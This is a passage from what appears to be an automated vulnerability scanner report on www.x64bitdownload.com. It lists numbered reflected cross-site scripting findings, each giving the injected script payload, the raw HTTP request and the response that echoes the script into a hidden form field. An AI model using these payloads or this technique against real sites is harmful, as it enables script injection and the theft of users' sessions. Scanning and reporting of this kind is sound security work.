The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cb00e"><script>alert(1)</script>e2b8c71a364 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /64-bit-video-downloads.htmlcb00e"><script>alert(1)</script>e2b8c71a364 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:47:14 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:57:18 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A5%3A%22video%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A5%3A%22video%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 99716

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/64-bit-video-downloads.htmlcb00e"><script>alert(1)</script>e2b8c71a364" />
...[SNIP]...

1.137. http://www.x64bitdownload.com/64-bit-video-downloads.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-video-downloads.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 52103"><script>alert(1)</script>c4132b9c2b9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /64-bit-video-downloads.html?52103"><script>alert(1)</script>c4132b9c2b9=1 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:42:35 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:52:38 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A5%3A%22video%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A5%3A%22video%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 99719

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/64-bit-video-downloads.html?52103"><script>alert(1)</script>c4132b9c2b9=1" />
...[SNIP]...

1.138. http://www.x64bitdownload.com/64-bit-xpat-downloads.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-xpat-downloads.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5865a"><script>alert(1)</script>73566294139 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /64-bit-xpat-downloads.html5865a"><script>alert(1)</script>73566294139 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:57:52 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 16:07:59 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A4%3A%22xpat%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A4%3A%22xpat%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 28936

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/64-bit-xpat-downloads.html5865a"><script>alert(1)</script>73566294139" />
...[SNIP]...

1.139. http://www.x64bitdownload.com/64-bit-xpat-downloads.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-xpat-downloads.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6fc61"><script>alert(1)</script>c4ecea0b493 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /64-bit-xpat-downloads.html?6fc61"><script>alert(1)</script>c4ecea0b493=1 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:54:19 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 16:04:52 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A4%3A%22xpat%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A4%3A%22xpat%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 28939

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/64-bit-xpat-downloads.html?6fc61"><script>alert(1)</script>c4ecea0b493=1" />
...[SNIP]...

1.140. http://www.x64bitdownload.com/64-bit-yenc-downloads.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-yenc-downloads.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b47d8"><script>alert(1)</script>80eaf09c798 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /64-bit-yenc-downloads.htmlb47d8"><script>alert(1)</script>80eaf09c798 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:44:57 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:55:07 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A4%3A%22yenc%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A4%3A%22yenc%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 49292

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/64-bit-yenc-downloads.htmlb47d8"><script>alert(1)</script>80eaf09c798" />
...[SNIP]...

1.141. http://www.x64bitdownload.com/64-bit-yenc-downloads.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-yenc-downloads.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bd8dd"><script>alert(1)</script>dc3655acae7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /64-bit-yenc-downloads.html?bd8dd"><script>alert(1)</script>dc3655acae7=1 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:41:35 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:51:44 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A4%3A%22yenc%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A4%3A%22yenc%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 49295

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/64-bit-yenc-downloads.html?bd8dd"><script>alert(1)</script>dc3655acae7=1" />
...[SNIP]...

1.142. http://www.x64bitdownload.com/a-oz-insight-1768-downloads.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/a-oz-insight-1768-downloads.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 97190"><script>alert(1)</script>9747501482a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /a-oz-insight-1768-downloads.html97190"><script>alert(1)</script>9747501482a HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:47:26 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:57:34 GMT
Cache-Control: max-age=600
Pragma: cache
Connection: close
Content-Type: text/html; charset=UTF-8
X-Pad: avoid browser bug
Content-Length: 26073

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/a-oz-insight-1768-downloads.html97190"><script>alert(1)</script>9747501482a" />
...[SNIP]...

1.143. http://www.x64bitdownload.com/a-oz-insight-1768-downloads.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/a-oz-insight-1768-downloads.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 654dd"><script>alert(1)</script>8885636ee6d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /a-oz-insight-1768-downloads.html?654dd"><script>alert(1)</script>8885636ee6d=1 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:44:36 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:54:40 GMT
Cache-Control: max-age=600
Pragma: cache
Connection: close
Content-Type: text/html; charset=UTF-8
X-Pad: avoid browser bug
Content-Length: 26076

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/a-oz-insight-1768-downloads.html?654dd"><script>alert(1)</script>8885636ee6d=1" />
...[SNIP]...

1.144. http://www.x64bitdownload.com/categories/free-64-bit-audio-multimedia-downloads-1-0-d.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/categories/free-64-bit-audio-multimedia-downloads-1-0-d.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2275c"><script>alert(1)</script>5b1950577da was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /categories2275c"><script>alert(1)</script>5b1950577da/free-64-bit-audio-multimedia-downloads-1-0-d.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 15:31:03 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 21335

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content-
...[SNIP]...
<input type="hidden" name="retpage" value="/categories2275c"><script>alert(1)</script>5b1950577da/free-64-bit-audio-multimedia-downloads-1-0-d.html" />
...[SNIP]...

1.145. http://www.x64bitdownload.com/categories/free-64-bit-audio-multimedia-downloads-1-0-d.html [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/categories/free-64-bit-audio-multimedia-downloads-1-0-d.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 93e79"><script>alert(1)</script>bc95b28f18 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /categories/free-64-bit-audio-multimedia-downloads-1-0-d.html93e79"><script>alert(1)</script>bc95b28f18 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:32:13 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:42:46 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A3%3A%7Bs%3A11%3A%22category_id%22%3Bs%3A1%3A%221%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22d%22%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 79681

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/categories/free-64-bit-audio-multimedia-downloads-1-0-d.html93e79"><script>alert(1)</script>bc95b28f18" />
...[SNIP]...

1.146. http://www.x64bitdownload.com/categories/free-64-bit-audio-multimedia-downloads-1-0-d.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/categories/free-64-bit-audio-multimedia-downloads-1-0-d.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b0caf"><script>alert(1)</script>6aa48f4bf87 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /categories/free-64-bit-audio-multimedia-downloads-1-0-d.html?b0caf"><script>alert(1)</script>6aa48f4bf87=1 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:26:29 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:36:44 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A3%3A%7Bs%3A11%3A%22category_id%22%3Bs%3A1%3A%221%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22d%22%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 79685

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/categories/free-64-bit-audio-multimedia-downloads-1-0-d.html?b0caf"><script>alert(1)</script>6aa48f4bf87=1" />
...[SNIP]...

1.147. http://www.x64bitdownload.com/categories/free-64-bit-business-downloads-2-0-d.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/categories/free-64-bit-business-downloads-2-0-d.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cfa0d"><script>alert(1)</script>6f7a56462ad was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /categoriescfa0d"><script>alert(1)</script>6f7a56462ad/free-64-bit-business-downloads-2-0-d.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 15:31:05 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 21327

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content-
...[SNIP]...
<input type="hidden" name="retpage" value="/categoriescfa0d"><script>alert(1)</script>6f7a56462ad/free-64-bit-business-downloads-2-0-d.html" />
...[SNIP]...

1.148. http://www.x64bitdownload.com/categories/free-64-bit-business-downloads-2-0-d.html [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/categories/free-64-bit-business-downloads-2-0-d.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bc60f"><script>alert(1)</script>60697c60e67 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /categories/free-64-bit-business-downloads-2-0-d.htmlbc60f"><script>alert(1)</script>60697c60e67 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:31:55 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:42:12 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A3%3A%7Bs%3A11%3A%22category_id%22%3Bs%3A1%3A%222%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22d%22%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 85699

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/categories/free-64-bit-business-downloads-2-0-d.htmlbc60f"><script>alert(1)</script>60697c60e67" />
...[SNIP]...

1.149. http://www.x64bitdownload.com/categories/free-64-bit-business-downloads-2-0-d.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/categories/free-64-bit-business-downloads-2-0-d.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6d41a"><script>alert(1)</script>99f91a14c93 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /categories/free-64-bit-business-downloads-2-0-d.html?6d41a"><script>alert(1)</script>99f91a14c93=1 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:27:02 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:37:33 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A3%3A%7Bs%3A11%3A%22category_id%22%3Bs%3A1%3A%222%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22d%22%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 85702

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/categories/free-64-bit-business-downloads-2-0-d.html?6d41a"><script>alert(1)</script>99f91a14c93=1" />
...[SNIP]...

1.150. http://www.x64bitdownload.com/categories/free-64-bit-communications-chat-instant-messaging-downloads-3-39-0-d.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/categories/free-64-bit-communications-chat-instant-messaging-downloads-3-39-0-d.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f845d"><script>alert(1)</script>ffca716742e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /categoriesf845d"><script>alert(1)</script>ffca716742e/free-64-bit-communications-chat-instant-messaging-downloads-3-39-0-d.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 15:30:02 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 21359

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content-
...[SNIP]...
<input type="hidden" name="retpage" value="/categoriesf845d"><script>alert(1)</script>ffca716742e/free-64-bit-communications-chat-instant-messaging-downloads-3-39-0-d.html" />
...[SNIP]...

1.151. http://www.x64bitdownload.com/categories/free-64-bit-communications-chat-instant-messaging-downloads-3-39-0-d.html [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/categories/free-64-bit-communications-chat-instant-messaging-downloads-3-39-0-d.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b2d3b"><script>alert(1)</script>93a1874d47f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /categories/free-64-bit-communications-chat-instant-messaging-downloads-3-39-0-d.htmlb2d3b"><script>alert(1)</script>93a1874d47f HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:30:53 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:41:03 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A4%3A%7Bs%3A11%3A%22category_id%22%3Bs%3A1%3A%223%22%3Bs%3A14%3A%22subcategory_id%22%3Bs%3A2%3A%2239%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22d%22%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 83164

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/categories/free-64-bit-communications-chat-instant-messaging-downloads-3-39-0-d.htmlb2d3b"><script>alert(1)</script>93a1874d47f" />
...[SNIP]...

1.152. http://www.x64bitdownload.com/categories/free-64-bit-communications-chat-instant-messaging-downloads-3-39-0-d.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/categories/free-64-bit-communications-chat-instant-messaging-downloads-3-39-0-d.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1fe46"><script>alert(1)</script>fbe8aea8d3a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

